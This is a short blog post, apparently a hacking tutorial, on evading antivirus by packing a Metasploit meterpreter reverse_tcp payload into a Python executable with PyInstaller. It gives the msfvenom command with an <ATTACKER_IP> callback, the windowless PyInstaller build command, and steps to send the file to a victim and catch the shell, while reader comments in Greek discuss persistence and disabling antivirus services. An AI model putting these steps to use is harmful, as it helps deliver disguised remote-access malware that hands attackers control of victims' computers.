AntiVirus ByPass using Python


In this article we will try to bypass Antivirus program using Python.But before we start our attack let's check if we have this programs in our VM network.For this attack i use 3 VMs:

  • Windows 7 (Victim)
  • Windows XP SP2 (PyInstaller)
  • Backtrack 5r3 (Metasploit)



Windows XP SP2 (PyInstaller)






BackTrack 5r3 (Metasploit)

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ATTACKER_IP> -a x86 -f c


Copy this shellcode and paste it into pastebin's file and replace the default.





Windows XP SP2



Now transfer the file which you created into windows xp  machine into the PyInstaller folder.Open command prompt and type this command inside PyIntaller-2.1.The command below will convert py to exe on the PyIntaller folder.

pyinstaller.py -w -a -F <PY file>







Windows 7  (Antivirus Avira & Windows Firewall On)

  • Send file to your victim
  • Run metasploit multi_handler exploit
  • Wait for connection back


Comments

  1. Καμιά ιδέα για να το κάνουμε persistant;;

    ReplyDelete
    Replies
    1. Ωραία ερώτηση για άρθρο!Η απάντηση δεν είναι απλή και δεν είναι στανταρ..Κάποια Antivirus μπορεί να το καταλάβουν και το σταματήσουν αλλά τι γίνετε αν μετά την επίθεση κλείσεις τα services του AV ? Δώσε μου λίγο χρόνο και θα ετοιμάσω κάτι ...Ευχαριστώ!

      Delete
  2. Ισχύει!Το κάθε AV αντιδρά διαφορετικά!Πάντως σε Eset & Security essentials το κόβει και δεν με αφήνει να κλείσω το service!Θα ήταν πολύ ενδιαφέρον ενα σχετικό άρθρο! Αν δοκιμάσω και άλλα AV θα σου πώ!!

    ReplyDelete

Post a Comment

Popular posts from this blog

Basic Pivoting with Cobaltstrike and Metasploit

Hiding Data Using White Space (Steganography)

Unhide a Hidden GPO